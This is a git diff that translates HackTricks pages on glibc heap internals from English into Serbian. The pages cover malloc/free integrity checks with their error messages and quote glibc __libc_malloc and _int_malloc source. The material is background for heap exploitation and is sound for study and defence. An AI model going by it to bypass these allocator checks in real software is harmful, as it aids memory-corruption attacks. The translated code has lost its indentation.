-    - Error message: `malloc(): largebin double linked list corrupted (bk)`
-- **Checks during large bin (by index) search:**
-  - `bck->fd-> bk != bck`:
-    - Error message: `malloc(): corrupted unsorted chunks`
-- **Checks during large bin (next bigger) search:**
-  - `bck->fd-> bk != bck`:
-    - Error message: `malloc(): corrupted unsorted chunks2`
-- **Checks during Top chunk use:**
-  - `chunksize(av->top) > av->system_mem`:
-    - Error message: `malloc(): corrupted top size`
+- **Provere tokom pretrage brzih binova:**
+- Ako je deo neusklađen:
+- Poruka o grešci: `malloc(): unaligned fastbin chunk detected 2`
+- Ako je napredni deo neusklađen:
+- Poruka o grešci: `malloc(): unaligned fastbin chunk detected`
+- Ako je vraćeni deo veličine koja nije ispravna zbog svog indeksa u brzom binu:
+- Poruka o grešci: `malloc(): memory corruption (fast)`
+- Ako je bilo koji deo korišćen za popunjavanje tcache-a neusklađen:
+- Poruka o grešci: `malloc(): unaligned fastbin chunk detected 3`
+- **Provere tokom pretrage malih binova:**
+- Ako `victim->bk->fd != victim`:
+- Poruka o grešci: `malloc(): smallbin double linked list corrupted`
+- **Provere tokom konsolidacije** izvršene za svaki deo brzog bin-a: 
+- Ako je deo neusklađen:
+- Poruka o grešci: `malloc_consolidate(): unaligned fastbin chunk detected`
+- Ako deo ima drugačiju veličinu od one koju bi trebao imati zbog indeksa u kojem se nalazi:
+- Poruka o grešci: `malloc_consolidate(): invalid chunk size`
+- Ako prethodni deo nije u upotrebi i prethodni deo ima veličinu koja se razlikuje od one naznačene od strane prev_chunk:
+- Poruka o grešci: `corrupted size vs. prev_size in fastbins`
+- **Provere tokom pretrage nesortiranih binova**:
+- Ako je veličina dela čudna (previše mala ili previše velika): 
+- Poruka o grešci: `malloc(): invalid size (unsorted)`
+- Ako je veličina sledećeg dela čudna (previše mala ili previše velika):
+- Poruka o grešci: `malloc(): invalid next size (unsorted)`
+- Ako se prethodna veličina naznačena od strane sledećeg dela razlikuje od veličine dela:
+- Poruka o grešci: `malloc(): mismatching next->prev_size (unsorted)`
+- Ako nije `victim->bck->fd == victim` ili nije `victim->fd == av (arena)`:
+- Poruka o grešci: `malloc(): unsorted double linked list corrupted`
+- Kako uvek proveravamo poslednji, njegov fd bi trebao uvek da pokazuje na strukturu arena.
+- Ako sledeći deo ne naznačuje da je prethodni u upotrebi:
+- Poruka o grešci: `malloc(): invalid next->prev_inuse (unsorted)`
+- Ako `fwd->bk_nextsize->fd_nextsize != fwd`:
+- Poruka o grešci: `malloc(): largebin double linked list corrupted (nextsize)`
+- Ako `fwd->bk->fd != fwd`:
+- Poruka o grešci: `malloc(): largebin double linked list corrupted (bk)`
+- **Provere tokom pretrage velikih binova (po indeksu):**
+- `bck->fd-> bk != bck`:
+- Poruka o grešci: `malloc(): corrupted unsorted chunks`
+- **Provere tokom pretrage velikih binova (sledeći veći):**
+- `bck->fd-> bk != bck`:
+- Poruka o grešci: `malloc(): corrupted unsorted chunks2`
+- **Provere tokom korišćenja Top dela:**
+- `chunksize(av->top) > av->system_mem`:
+- Poruka o grešci: `malloc(): corrupted top size`
 
 ## `tcache_get_n`
 
-- **Checks in `tcache_get_n`:**
-  - If chunk is misaligned:
-    - Error message: `malloc(): unaligned tcache chunk detected`
+- **Provere u `tcache_get_n`:**
+- Ako je deo neusklađen:
+- Poruka o grešci: `malloc(): unaligned tcache chunk detected`
 
 ## `tcache_thread_shutdown`
 
-- **Checks in `tcache_thread_shutdown`:**
-  - If chunk is misaligned:
-    - Error message: `tcache_thread_shutdown(): unaligned tcache chunk detected`
+- **Provere u `tcache_thread_shutdown`:**
+- Ako je deo neusklađen:
+- Poruka o grešci: `tcache_thread_shutdown(): unaligned tcache chunk detected`
 
 ## `__libc_realloc`
 
-- **Checks in `__libc_realloc`:**
-  - If old pointer is misaligned or the size was incorrect:
-    - Error message: `realloc(): invalid pointer`
+- **Provere u `__libc_realloc`:**
+- Ako je stari pokazivač neusklađen ili je veličina bila neispravna:
+- Poruka o grešci: `realloc(): invalid pointer`
 
 ## `_int_free`
 
-For more info check:
+Za više informacija pogledajte:
 
 {{#ref}}
 free.md
 {{#endref}}
 
-- **Checks during the start of `_int_free`:**
-  - Pointer is aligned:
-    - Error message: `free(): invalid pointer`
-  - Size larger than `MINSIZE` and size also aligned:
-    - Error message: `free(): invalid size`
-- **Checks in `_int_free` tcache:**
-  - If there are more entries than `mp_.tcache_count`:
-    - Error message: `free(): too many chunks detected in tcache`
-  - If the entry is not aligned:
-    - Error message: `free(): unaligned chunk detected in tcache 2`
-  - If the freed chunk was already freed and is present as chunk in the tcache:
-    - Error message: `free(): double free detected in tcache 2`
-- **Checks in `_int_free` fast bin:**
-  - If the size of the chunk is invalid (too big or small) trigger:
-    - Error message: `free(): invalid next size (fast)`
-  - If the added chunk was already the top of the fast bin:
-    - Error message: `double free or corruption (fasttop)`
-  - If the size of the chunk at the top has a different size of the chunk we are adding:
-    - Error message: `invalid fastbin entry (free)`
+- **Provere na početku `_int_free`:**
+- Pokazivač je usklađen:
+- Poruka o grešci: `free(): invalid pointer`
+- Veličina veća od `MINSIZE` i veličina takođe usklađena:
+- Poruka o grešci: `free(): invalid size`
+- **Provere u `_int_free` tcache:**
+- Ako ima više unosa nego `mp_.tcache_count`:
+- Poruka o grešci: `free(): too many chunks detected in tcache`
+- Ako unos nije usklađen:
+- Poruka o grešci: `free(): unaligned chunk detected in tcache 2`
+- Ako je oslobođeni deo već bio oslobođen i prisutan je kao deo u tcache:
+- Poruka o grešci: `free(): double free detected in tcache 2`
+- **Provere u `_int_free` brzom binu:**
+- Ako je veličina dela neispravna (prevelika ili premala) pokreni:
+- Poruka o grešci: `free(): invalid next size (fast)`
+- Ako je dodatni deo već bio vrh brzog bin-a:
+- Poruka o grešci: `double free or corruption (fasttop)`
+- Ako veličina dela na vrhu ima drugačiju veličinu od dela koji dodajemo:
+- Poruka o grešci: `invalid fastbin entry (free)`
 
 ## **`_int_free_merge_chunk`**
 
-- **Checks in `_int_free_merge_chunk`:**
-  - If the chunk is the top chunk:
-    - Error message: `double free or corruption (top)`
-  - If the next chunk is outside of the boundaries of the arena:
-    - Error message: `double free or corruption (out)`
-  - If the chunk is not marked as used (in the prev_inuse from the following chunk):
-    - Error message: `double free or corruption (!prev)`
-  - If the next chunk has a too little size or too big:
-    - Error message: `free(): invalid next size (normal)`
-  - If the previous chunk is not in use, it will try to consolidate. But, if the `prev_size` differs from the size indicated in the previous chunk:
-    - Error message: `corrupted size vs. prev_size while consolidating`
+- **Provere u `_int_free_merge_chunk`:**
+- Ako je deo vrh deo:
+- Poruka o grešci: `double free or corruption (top)`
+- Ako je sledeći deo van granica arene:
+- Poruka o grešci: `double free or corruption (out)`
+- Ako deo nije označen kao korišćen (u prev_inuse od sledećeg dela):
+- Poruka o grešci: `double free or corruption (!prev)`
+- Ako sledeći deo ima previše malu ili preveliku veličinu:
+- Poruka o grešci: `free(): invalid next size (normal)`
+- Ako prethodni deo nije u upotrebi, pokušaće da konsoliduje. Ali, ako se `prev_size` razlikuje od veličine naznačene u prethodnom delu:
+- Poruka o grešci: `corrupted size vs. prev_size while consolidating`
 
 ## **`_int_free_create_chunk`**
 
-- **Checks in `_int_free_create_chunk`:**
-  - Adding a chunk into the unsorted bin, check if `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`:
-    - Error message: `free(): corrupted unsorted chunks`
+- **Provere u `_int_free_create_chunk`:**
+- Dodavanje dela u nesortirani bin, proverite da li `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`:
+- Poruka o grešci: `free(): corrupted unsorted chunks`
 
 ## `do_check_malloc_state`
 
-- **Checks in `do_check_malloc_state`:**
-  - If misaligned fast bin chunk:
-    - Error message: `do_check_malloc_state(): unaligned fastbin chunk detected`
+- **Provere u `do_check_malloc_state`:**
+- Ako je deo neusklađen brzog bin-a:
+- Poruka o grešci: `do_check_malloc_state(): unaligned fastbin chunk detected`
 
 ## `malloc_consolidate`
 
-- **Checks in `malloc_consolidate`:**
-  - If misaligned fast bin chunk:
-    - Error message: `malloc_consolidate(): unaligned fastbin chunk detected`
-  - If incorrect fast bin chunk size:
-    - Error message: `malloc_consolidate(): invalid chunk size`
+- **Provere u `malloc_consolidate`:**
+- Ako je deo neusklađen brzog bin-a:
+- Poruka o grešci: `malloc_consolidate(): unaligned fastbin chunk detected`
+- Ako je veličina dela brzog bin-a neispravna:
+- Poruka o grešci: `malloc_consolidate(): invalid chunk size`
 
 ## `_int_realloc`
 
-- **Checks in `_int_realloc`:**
-  - Size is too big or too small:
-    - Error message: `realloc(): invalid old size`
-  - Size of the next chunk is too big or too small:
-    - Error message: `realloc(): invalid next size`
+- **Provere u `_int_realloc`:**
+- Veličina je prevelika ili premala:
+- Poruka o grešci: `realloc(): invalid old size`
+- Veličina sledećeg dela je prevelika ili premala:
+- Poruka o grešci: `realloc(): invalid next size`
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
index 3b2ab7085..e089fbf27 100644
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
@@ -2,37 +2,36 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Allocation Order Summary 
+## Rezime Redosleda Alokacije 
 
-(No checks are explained in this summary and some case have been omitted for brevity)
+(Nema provere objašnjenih u ovom rezimeu i neki slučajevi su izostavljeni radi sažetosti)
 
-1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc`
+1. `__libc_malloc` pokušava da dobije deo iz tcache, ako ne uspe, poziva `_int_malloc`
 2. `_int_malloc` : 
-   1. Tries to generate the arena if there isn't any
-   2. If any fast bin chunk of the correct size, use it
-      1. Fill tcache with other fast chunks
-   3. If any small bin chunk of the correct size, use it
-      1. Fill tcache with other chunks of that size
-   4. If the requested size isn't for small bins, consolidate fast bin into unsorted bin
-   5. Check the unsorted bin, use the first chunk with enough space
-      1. If the found chunk is bigger, divide it to return a part and add the reminder back to the unsorted bin
-      2. If a chunk is of the same size as the size requested, use to to fill the tcache instead of returning it (until the tcache is full, then return the next one)
-      3. For each chunk of smaller size checked, put it in its respective small or large bin
-   6. Check the large bin in the index of the requested size
-      1. Start looking from the first chunk that is bigger than the requested size, if any is found return it and add the reminders to the small bin
-   7. Check the large bins from the next indexes until the end
-      1. From the next bigger index check for any chunk, divide the first found chunk to use it for the requested size and add the reminder to the unsorted bin
-   8. If nothing is found in the previous bins, get a chunk from the top chunk
-   9. If the top chunk wasn't big enough enlarge it with `sysmalloc`
+1. Pokušava da generiše arenu ako ne postoji
+2. Ako postoji bilo koji fast bin deo odgovarajuće veličine, koristi ga
+1. Popunjava tcache sa drugim brzim delovima
+3. Ako postoji bilo koji small bin deo odgovarajuće veličine, koristi ga
+1. Popunjava tcache sa drugim delovima te veličine
+4. Ako tražena veličina nije za small bins, konsoliduje fast bin u nesortirani bin
+5. Proverava nesortirani bin, koristi prvi deo sa dovoljno prostora
+1. Ako je pronađeni deo veći, podeli ga da vrati deo i dodaj ostatak nazad u nesortirani bin
+2. Ako je deo iste veličine kao tražena veličina, koristi ga da popuni tcache umesto da ga vrati (dok tcache ne bude pun, onda vrati sledeći)
+3. Za svaki deo manje veličine koji se proverava, stavi ga u odgovarajući small ili large bin
+6. Proverava large bin u indeksu tražene veličine
+1. Počinje da gleda od prvog dela koji je veći od tražene veličine, ako se pronađe, vrati ga i dodaj ostatke u small bin
+7. Proverava large bins od sledećih indeksa do kraja
+1. Od sledećeg većeg indeksa proverava bilo koji deo, podeli prvi pronađeni deo da ga koristi za traženu veličinu i dodaj ostatak u nesortirani bin
+8. Ako ništa nije pronađeno u prethodnim binovima, uzmi deo iz top chunk
+9. Ako top chunk nije bio dovoljno velik, povećaj ga sa `sysmalloc`
 
 ## \_\_libc_malloc 
 
-The `malloc` function actually calls `__libc_malloc`. This function will check the tcache to see if there is any available chunk of the desired size. If the re is it'll use it and if not it'll check if it's a single thread and in that case it'll call `_int_malloc` in the main arena, and if not it'll call `_int_malloc` in arena of the thread.
+Funkcija `malloc` zapravo poziva `__libc_malloc`. Ova funkcija će proveriti tcache da vidi da li postoji bilo koji dostupni deo željene veličine. Ako postoji, koristiće ga, a ako ne, proveriće da li je u pitanju jedinstvena nit i u tom slučaju će pozvati `_int_malloc` u glavnoj areni, a ako ne, pozvaće `_int_malloc` u areni niti.
 
 

 
-__libc_malloc code
-
+__libc_malloc kod
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c
 
@@ -40,1707 +39,1660 @@ The `malloc` function actually calls `__libc_malloc`. This function will check t
 void *
 __libc_malloc (size_t bytes)
 {
-  mstate ar_ptr;
-  void *victim;
+mstate ar_ptr;
+void *victim;
 
-  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
-                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+"PTRDIFF_MAX is not more than half of SIZE_MAX");
 
-  if (!__malloc_initialized)
-    ptmalloc_init ();
+if (!__malloc_initialized)
+ptmalloc_init ();
 #if USE_TCACHE
-  /* int_free also calls request2size, be careful to not pad twice.  */
-  size_t tbytes = checked_request2size (bytes);
-  if (tbytes == 0)
-    {
-      __set_errno (ENOMEM);
-      return NULL;
-    }
-  size_t tc_idx = csize2tidx (tbytes);
+/* int_free also calls request2size, be careful to not pad twice.  */
+size_t tbytes = checked_request2size (bytes);
+if (tbytes == 0)
+{
+__set_errno (ENOMEM);
+return NULL;
+}
+size_t tc_idx = csize2tidx (tbytes);
 
-  MAYBE_INIT_TCACHE ();
+MAYBE_INIT_TCACHE ();
 
-  DIAG_PUSH_NEEDS_COMMENT;
-  if (tc_idx < mp_.tcache_bins
-      && tcache != NULL
-      && tcache->counts[tc_idx] > 0)
-    {
-      victim = tcache_get (tc_idx);
-      return tag_new_usable (victim);
-    }
-  DIAG_POP_NEEDS_COMMENT;
+DIAG_PUSH_NEEDS_COMMENT;
+if (tc_idx < mp_.tcache_bins
+&& tcache != NULL
+&& tcache->counts[tc_idx] > 0)
+{
+victim = tcache_get (tc_idx);
+return tag_new_usable (victim);
+}
+DIAG_POP_NEEDS_COMMENT;
 #endif
 
-  if (SINGLE_THREAD_P)
-    {
-      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
-      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
-	      &main_arena == arena_for_chunk (mem2chunk (victim)));
-      return victim;
-    }
+if (SINGLE_THREAD_P)
+{
+victim = tag_new_usable (_int_malloc (&main_arena, bytes));
+assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+&main_arena == arena_for_chunk (mem2chunk (victim)));
+return victim;
+}
 
-  arena_get (ar_ptr, bytes);
+arena_get (ar_ptr, bytes);
 
-  victim = _int_malloc (ar_ptr, bytes);
-  /* Retry with another arena only if we were able to find a usable arena
-     before.  */
-  if (!victim && ar_ptr != NULL)
-    {
-      LIBC_PROBE (memory_malloc_retry, 1, bytes);
-      ar_ptr = arena_get_retry (ar_ptr, bytes);
-      victim = _int_malloc (ar_ptr, bytes);
-    }
+victim = _int_malloc (ar_ptr, bytes);
+/* Retry with another arena only if we were able to find a usable arena
+before.  */
+if (!victim && ar_ptr != NULL)
+{
+LIBC_PROBE (memory_malloc_retry, 1, bytes);
+ar_ptr = arena_get_retry (ar_ptr, bytes);
+victim = _int_malloc (ar_ptr, bytes);
+}
 
-  if (ar_ptr != NULL)
-    __libc_lock_unlock (ar_ptr->mutex);
+if (ar_ptr != NULL)
+__libc_lock_unlock (ar_ptr->mutex);
 
-  victim = tag_new_usable (victim);
+victim = tag_new_usable (victim);
 
-  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
-          ar_ptr == arena_for_chunk (mem2chunk (victim)));
-  return victim;
+assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+ar_ptr == arena_for_chunk (mem2chunk (victim)));
+return victim;
 }
 ```
-
 

 
-Note how it'll always tag the returned pointer with `tag_new_usable`, from the code:
-
+Napomena kako će uvek označiti vraćeni pokazivač sa `tag_new_usable`, iz koda:
 ```c
- void *tag_new_usable (void *ptr)
+void *tag_new_usable (void *ptr)
 
-   Allocate a new random color and use it to color the user region of
-   a chunk; this may include data from the subsequent chunk's header
-   if tagging is sufficiently fine grained.  Returns PTR suitably
-   recolored for accessing the memory there.
+Allocate a new random color and use it to color the user region of
+a chunk; this may include data from the subsequent chunk's header
+if tagging is sufficiently fine grained.  Returns PTR suitably
+recolored for accessing the memory there.
 ```
-
 ## \_int_malloc 
 
-This is the function that allocates memory using the other bins and top chunk.
+Ovo je funkcija koja alocira memoriju koristeći druge binove i top chunk.
 
-- Start
+- Početak
 
-It starts defining some vars and getting the real size the request memory space need to have:
+Počinje definisanjem nekih varijabli i dobijanjem stvarne veličine koju traženi prostor za memoriju treba da ima:
 
 

 
 _int_malloc start
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3847
 static void *
 _int_malloc (mstate av, size_t bytes)
 {
-  INTERNAL_SIZE_T nb;               /* normalized request size */
-  unsigned int idx;                 /* associated bin index */
-  mbinptr bin;                      /* associated bin */
+INTERNAL_SIZE_T nb;               /* normalized request size */
+unsigned int idx;                 /* associated bin index */
+mbinptr bin;                      /* associated bin */
 
-  mchunkptr victim;                 /* inspected/selected chunk */
-  INTERNAL_SIZE_T size;             /* its size */
-  int victim_index;                 /* its bin index */
+mchunkptr victim;                 /* inspected/selected chunk */
+INTERNAL_SIZE_T size;             /* its size */
+int victim_index;                 /* its bin index */
 
-  mchunkptr remainder;              /* remainder from a split */
-  unsigned long remainder_size;     /* its size */
+mchunkptr remainder;              /* remainder from a split */
+unsigned long remainder_size;     /* its size */
 
-  unsigned int block;               /* bit map traverser */
-  unsigned int bit;                 /* bit map traverser */
-  unsigned int map;                 /* current word of binmap */
+unsigned int block;               /* bit map traverser */
+unsigned int bit;                 /* bit map traverser */
+unsigned int map;                 /* current word of binmap */
 
-  mchunkptr fwd;                    /* misc temp for linking */
-  mchunkptr bck;                    /* misc temp for linking */
+mchunkptr fwd;                    /* misc temp for linking */
+mchunkptr bck;                    /* misc temp for linking */
 
 #if USE_TCACHE
-  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
 #endif
 
-  /*
-     Convert request size to internal form by adding SIZE_SZ bytes
-     overhead plus possibly more to obtain necessary alignment and/or
-     to obtain a size of at least MINSIZE, the smallest allocatable
-     size. Also, checked_request2size returns false for request sizes
-     that are so large that they wrap around zero when padded and
-     aligned.
-   */
+/*
+Convert request size to internal form by adding SIZE_SZ bytes
+overhead plus possibly more to obtain necessary alignment and/or
+to obtain a size of at least MINSIZE, the smallest allocatable
+size. Also, checked_request2size returns false for request sizes
+that are so large that they wrap around zero when padded and
+aligned.
+*/
 
-  nb = checked_request2size (bytes);
-  if (nb == 0)
-    {
-      __set_errno (ENOMEM);
-      return NULL;
-    }
+nb = checked_request2size (bytes);
+if (nb == 0)
+{
+__set_errno (ENOMEM);
+return NULL;
+}
 ```
-
 

 
 ### Arena
 
-In the unlikely event that there aren't usable arenas, it uses `sysmalloc` to get a chunk from `mmap`:
+U malo verovatnom slučaju da ne postoje upotrebljive arene, koristi `sysmalloc` da dobije deo iz `mmap`:
 
 

 
 _int_malloc not arena
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3885C3-L3893C6
 /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
-     mmap.  */
-  if (__glibc_unlikely (av == NULL))
-    {
-      void *p = sysmalloc (nb, av);
-      if (p != NULL)
-	alloc_perturb (p, bytes);
-      return p;
-    }
+mmap.  */
+if (__glibc_unlikely (av == NULL))
+{
+void *p = sysmalloc (nb, av);
+if (p != NULL)
+alloc_perturb (p, bytes);
+return p;
+}
 ```
-
 

 
 ### Fast Bin
 
-If the needed size is inside the Fast Bins sizes, try to use a chunk from the fast bin. Basically, based on the size, it'll find the fast bin index where valid chunks should be located, and if any, it'll return one of those.\
-Moreover, if tcache is enabled, it'll **fill the tcache bin of that size with fast bins**.
+Ako je potrebna veličina unutar veličina Fast Bins, pokušajte da koristite deo iz fast bin. U suštini, na osnovu veličine, pronaći će indeks fast bin-a gde bi validni delovi trebali biti locirani, i ako ih ima, vratiće jedan od njih.\
+Štaviše, ako je tcache omogućena, **napuniće tcache bin te veličine sa fast bins**.
 
-While performing these actions, some security checks are executed in here:
+Tokom izvođenja ovih akcija, izvršavaju se neki bezbednosni provere:
 
-- If the chunk is misaligned: `malloc(): unaligned fastbin chunk detected 2`
-- If the forward chunk is misaligned: `malloc(): unaligned fastbin chunk detected`
-- If the returned chunk has a size that isn't correct because of it's index in the fast bin: `malloc(): memory corruption (fast)`
-- If any chunk used to fill the tcache is misaligned: `malloc(): unaligned fastbin chunk detected 3`
+- Ako je deo neusklađen: `malloc(): unaligned fastbin chunk detected 2`
+- Ako je napredni deo neusklađen: `malloc(): unaligned fastbin chunk detected`
+- Ako vraćeni deo ima veličinu koja nije ispravna zbog svog indeksa u fast bin: `malloc(): memory corruption (fast)`
+- Ako je bilo koji deo korišćen za punjenje tcache neusklađen: `malloc(): unaligned fastbin chunk detected 3`
 
 

 
 _int_malloc fast bin
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3895C3-L3967C6
 /*
-     If the size qualifies as a fastbin, first check corresponding bin.
-     This code is safe to execute even if av is not yet initialized, so we
-     can try it without checking, which saves some time on this fast path.
-   */
+If the size qualifies as a fastbin, first check corresponding bin.
+This code is safe to execute even if av is not yet initialized, so we
+can try it without checking, which saves some time on this fast path.
+*/
 
 #define REMOVE_FB(fb, victim, pp)			\
-  do							\
-    {							\
-      victim = pp;					\
-      if (victim == NULL)				\
-	break;						\
-      pp = REVEAL_PTR (victim->fd);                                     \
-      if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
-	malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
-    }							\
-  while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
-	 != victim);					\
+do							\
+{							\
+victim = pp;					\
+if (victim == NULL)				\
+break;						\
+pp = REVEAL_PTR (victim->fd);                                     \
+if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
+malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
+}							\
+while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
+!= victim);					\
 
-  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
-    {
-      idx = fastbin_index (nb);
-      mfastbinptr *fb = &fastbin (av, idx);
-      mchunkptr pp;
-      victim = *fb;
+if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+{
+idx = fastbin_index (nb);
+mfastbinptr *fb = &fastbin (av, idx);
+mchunkptr pp;
+victim = *fb;
 
-      if (victim != NULL)
-	{
-	  if (__glibc_unlikely (misaligned_chunk (victim)))
-	    malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
+if (victim != NULL)
+{
+if (__glibc_unlikely (misaligned_chunk (victim)))
+malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
 
-	  if (SINGLE_THREAD_P)
-	    *fb = REVEAL_PTR (victim->fd);
-	  else
-	    REMOVE_FB (fb, pp, victim);
-	  if (__glibc_likely (victim != NULL))
-	    {
-	      size_t victim_idx = fastbin_index (chunksize (victim));
-	      if (__builtin_expect (victim_idx != idx, 0))
-		malloc_printerr ("malloc(): memory corruption (fast)");
-	      check_remalloced_chunk (av, victim, nb);
+if (SINGLE_THREAD_P)
+*fb = REVEAL_PTR (victim->fd);
+else
+REMOVE_FB (fb, pp, victim);
+if (__glibc_likely (victim != NULL))
+{
+size_t victim_idx = fastbin_index (chunksize (victim));
+if (__builtin_expect (victim_idx != idx, 0))
+malloc_printerr ("malloc(): memory corruption (fast)");
+check_remalloced_chunk (av, victim, nb);
 #if USE_TCACHE
-	      /* While we're here, if we see other chunks of the same size,
-		 stash them in the tcache.  */
-	      size_t tc_idx = csize2tidx (nb);
-	      if (tcache != NULL && tc_idx < mp_.tcache_bins)
-		{
-		  mchunkptr tc_victim;
+/* While we're here, if we see other chunks of the same size,
+stash them in the tcache.  */
+size_t tc_idx = csize2tidx (nb);
+if (tcache != NULL && tc_idx < mp_.tcache_bins)
+{
+mchunkptr tc_victim;
 
-		  /* While bin not empty and tcache not full, copy chunks.  */
-		  while (tcache->counts[tc_idx] < mp_.tcache_count
-			 && (tc_victim = *fb) != NULL)
-		    {
-		      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
-			malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
-		      if (SINGLE_THREAD_P)
-			*fb = REVEAL_PTR (tc_victim->fd);
-		      else
-			{
-			  REMOVE_FB (fb, pp, tc_victim);
-			  if (__glibc_unlikely (tc_victim == NULL))
-			    break;
-			}
-		      tcache_put (tc_victim, tc_idx);
-		    }
-		}
+/* While bin not empty and tcache not full, copy chunks.  */
+while (tcache->counts[tc_idx] < mp_.tcache_count
+&& (tc_victim = *fb) != NULL)
+{
+if (__glibc_unlikely (misaligned_chunk (tc_victim)))
+malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
+if (SINGLE_THREAD_P)
+*fb = REVEAL_PTR (tc_victim->fd);
+else
+{
+REMOVE_FB (fb, pp, tc_victim);
+if (__glibc_unlikely (tc_victim == NULL))
+break;
+}
+tcache_put (tc_victim, tc_idx);
+}
+}
 #endif
-	      void *p = chunk2mem (victim);
-	      alloc_perturb (p, bytes);
-	      return p;
-	    }
-	}
-    }
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
+}
+}
 ```
-
 

 
 ### Small Bin
 
-As indicated in a comment, small bins hold one size per index, therefore checking if a valid chunk is available is super fast, so after fast bins, small bins are checked.
+Kao što je naznačeno u komentaru, mali binovi drže jednu veličinu po indeksu, tako da je provera da li je dostupna validna chunk veoma brza, pa se nakon brzih binova proveravaju mali binovi.
 
-The first check is to find out if the requested size could be inside a small bin. In that case, get the corresponded **index** inside the smallbin and see if there is **any available chunk**.
+Prva provera je da se utvrdi da li tražena veličina može biti unutar malog bina. U tom slučaju, uzmite odgovarajući **indeks** unutar smallbina i proverite da li postoji **bilo koja dostupna chunk**.
 
-Then, a security check is performed checking:
+Zatim se vrši bezbednosna provera:
 
--  if `victim->bk->fd = victim`. To see that both chunks are correctly linked.
+-  if `victim->bk->fd = victim`. Da se vidi da su oba chunk-a ispravno povezana.
 
-In that case, the chunk **gets the `inuse` bit,** the doubled linked list is fixed so this chunk disappears from it (as it's going to be used), and the non main arena bit is set if needed.
+U tom slučaju, chunk **dobija `inuse` bit,** dvostruko povezana lista se ispravlja tako da ovaj chunk nestaje iz nje (jer će biti korišćen), a bit za ne glavnu arenu se postavlja ako je potrebno.
 
-Finally, **fill the tcache index of the requested size** with other chunks inside the small bin (if any).
+Na kraju, **popunite tcache indeks tražene veličine** sa drugim chunk-ovima unutar malog bina (ako ih ima).
 
 

 
 _int_malloc small bin
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3895C3-L3967C6
 
 /*
-     If a small request, check regular bin.  Since these "smallbins"
-     hold one size each, no searching within bins is necessary.
-     (For a large request, we need to wait until unsorted chunks are
-     processed to find best fit. But for small ones, fits are exact
-     anyway, so we can check now, which is faster.)
-   */
+If a small request, check regular bin.  Since these "smallbins"
+hold one size each, no searching within bins is necessary.
+(For a large request, we need to wait until unsorted chunks are
+processed to find best fit. But for small ones, fits are exact
+anyway, so we can check now, which is faster.)
+*/
 
-  if (in_smallbin_range (nb))
-    {
-      idx = smallbin_index (nb);
-      bin = bin_at (av, idx);
+if (in_smallbin_range (nb))
+{
+idx = smallbin_index (nb);
+bin = bin_at (av, idx);
 
-      if ((victim = last (bin)) != bin)
-        {
-          bck = victim->bk;
-	  if (__glibc_unlikely (bck->fd != victim))
-	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
-          set_inuse_bit_at_offset (victim, nb);
-          bin->bk = bck;
-          bck->fd = bin;
+if ((victim = last (bin)) != bin)
+{
+bck = victim->bk;
+if (__glibc_unlikely (bck->fd != victim))
+malloc_printerr ("malloc(): smallbin double linked list corrupted");
+set_inuse_bit_at_offset (victim, nb);
+bin->bk = bck;
+bck->fd = bin;
 
-          if (av != &main_arena)
-	    set_non_main_arena (victim);
-          check_malloced_chunk (av, victim, nb);
+if (av != &main_arena)
+set_non_main_arena (victim);
+check_malloced_chunk (av, victim, nb);
 #if USE_TCACHE
-	  /* While we're here, if we see other chunks of the same size,
-	     stash them in the tcache.  */
-	  size_t tc_idx = csize2tidx (nb);
-	  if (tcache != NULL && tc_idx < mp_.tcache_bins)
-	    {
-	      mchunkptr tc_victim;
+/* While we're here, if we see other chunks of the same size,
+stash them in the tcache.  */
+size_t tc_idx = csize2tidx (nb);
+if (tcache != NULL && tc_idx < mp_.tcache_bins)
+{
+mchunkptr tc_victim;
 
-	      /* While bin not empty and tcache not full, copy chunks over.  */
-	      while (tcache->counts[tc_idx] < mp_.tcache_count
-		     && (tc_victim = last (bin)) != bin)
-		{
-		  if (tc_victim != 0)
-		    {
-		      bck = tc_victim->bk;
-		      set_inuse_bit_at_offset (tc_victim, nb);
-		      if (av != &main_arena)
